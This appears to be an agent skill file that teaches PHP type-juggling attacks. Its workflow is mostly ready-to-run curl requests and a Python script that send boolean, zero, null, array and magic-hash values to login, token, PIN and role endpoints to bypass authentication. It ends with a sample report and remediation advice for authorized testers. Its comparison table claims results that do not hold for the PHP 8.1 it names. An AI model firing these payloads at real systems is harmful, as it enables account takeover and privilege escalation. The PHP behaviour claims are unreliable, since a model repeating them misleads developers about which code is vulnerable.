| name | exploiting-type-juggling-vulnerabilities |
| description | Exploit PHP type juggling vulnerabilities caused by loose comparison operators to bypass authentication, circumvent hash verification, and manipulate application logic through type coercion attacks. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - type-juggling - php-security - loose-comparison - authentication-bypass - magic-hash - type-coercion - web-security |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Exploiting Type Juggling Vulnerabilities
When to Use
- When testing PHP web applications for authentication bypass vulnerabilities
- During assessment of password comparison and hash verification logic
- When testing applications using loose comparison (== instead of ===)
- During code review of PHP applications handling JSON or deserialized input
- When evaluating input validation that relies on type-dependent comparison
Prerequisites
- Understanding of PHP type system and loose comparison behavior
- Knowledge of magic hash values (0e prefix) and their scientific notation interpretation
- Burp Suite for request manipulation and parameter type changing
- PHP development environment for testing payloads locally
- Collection of magic hash strings from PayloadsAllTheThings
- Ability to send JSON or serialized data to control input types
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1 โ Identify Type Juggling Candidates
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":"test"}'
Step 2 โ Exploit Loose Comparison Authentication Bypass
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":0}'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":true}'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":[]}'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":null}'
curl -X POST http://target.com/login \
-d "username=admin&password[]=anything"
Step 3 โ Exploit Magic Hash Collisions
curl -X POST http://target.com/login \
-d "username=admin&password=240610708"
for payload in "240610708" "QNKCDZO" "aabg7XSs" "aabC9RqS" "0e1137126905" "0e215962017"; do
echo -n "Testing: $payload -> "
curl -s -X POST http://target.com/login \
-d "username=admin&password=$payload" -o /dev/null -w "%{http_code}"
echo
done
Step 4 โ Exploit Comparison in Access Control
curl "http://target.com/api/user?id=1abc"
curl -X POST http://target.com/api/action \
-H "Content-Type: application/json" \
-d '{"action":"delete","role":true}'
curl -X POST http://target.com/api/verify \
-H "Content-Type: application/json" \
-d '{"token":0}'
Step 5 โ Exploit via Deserialization Input
curl -X POST http://target.com/api/verify-token \
-H "Content-Type: application/json" \
-d '{"token":true}'
curl -X POST http://target.com/api/verify-pin \
-H "Content-Type: application/json" \
-d '{"pin":true}'
curl -X POST http://target.com/api/check-code \
-H "Content-Type: application/json" \
-d '{"code":0}'
Step 6 โ Automated Type Juggling Testing
python3 -c "
import requests
import json
url = 'http://target.com/api/login'
payloads = [True, False, None, 0, 1, '', [], '0', '0e99999', '240610708', 'QNKCDZO']
for p in payloads:
data = {'username': 'admin', 'password': p}
r = requests.post(url, json=data)
print(f'password={json.dumps(p):20s} -> Status: {r.status_code}, Length: {len(r.text)}')
"
Key Concepts
| Concept | Description |
|---|
| Loose Comparison (==) | PHP comparison that performs type coercion before comparing values |
| Strict Comparison (===) | PHP comparison requiring both value and type to match |
| Magic Hash | String whose hash starts with "0e" followed by digits, evaluating to 0 in loose comparison |
| Type Coercion | Automatic conversion between types (string to int, null to 0) during comparison |
| strcmp Bypass | Passing array to strcmp() returns NULL, which equals 0 in loose comparison |
| JSON Type Control | Using JSON input to send specific types (boolean, integer, null) to PHP endpoints |
| Scientific Notation | PHP interprets "0eN" strings as 0 in exponential notation during numeric comparison |
Tools & Systems
| Tool | Purpose |
|---|
| Burp Suite | HTTP proxy for changing parameter types in requests |
| PHP interactive shell | Local testing of type juggling behavior |
| PayloadsAllTheThings | Curated magic hash and type juggling payload lists |
| phpggc | PHP generic gadget chains for deserialization exploitation |
| Custom Python scripts | Automated type juggling payload testing |
| PHPStan/Psalm | Static analysis tools detecting loose comparisons in code |
Common Scenarios
- Authentication Bypass via Boolean โ Send
"password": true as JSON to bypass loose comparison password verification
- Magic Hash Collision โ Use known magic hash input ("240610708") whose MD5 starts with "0e" to match against stored hashes
- strcmp Array Bypass โ Send
password[]=anything to make strcmp() return NULL, bypassing password comparison
- PIN/OTP Bypass โ Send integer 0 as verification code to match against "0e..." hash of the actual code
- Role Escalation โ Send
"role": true to match any non-empty role string in loose comparison access checks
Output Format
## Type Juggling Vulnerability Report
- **Target**: http://target.com
- **Language**: PHP 8.1
- **Framework**: Laravel
### Findings
| # | Endpoint | Parameter | Payload | Type | Impact |
|---|----------|-----------|---------|------|--------|
| 1 | POST /login | password | true (boolean) | Loose comparison | Auth bypass |
| 2 | POST /login | password | 240610708 (magic hash) | MD5 0e collision | Auth bypass |
| 3 | POST /login | password[] | array | strcmp NULL return | Auth bypass |
| 4 | POST /verify | code | 0 (integer) | Numeric comparison | OTP bypass |
### PHP Comparison Table (Relevant)
| Expression | Result | Reason |
|-----------|--------|--------|
| 0 == "password" | TRUE | String cast to 0 |
| true == "password" | TRUE | Non-empty string is truthy |
| "0e123" == "0e456" | TRUE | Both are scientific notation = 0 |
| NULL == 0 | TRUE | NULL cast to 0 |
### Remediation
- Replace all == with === (strict comparison) in security-critical code
- Use password_verify() for password comparison instead of direct comparison
- Use hash_equals() for timing-safe hash comparison
- Validate input types before comparison operations
- Enable PHP strict_types declaration in all files
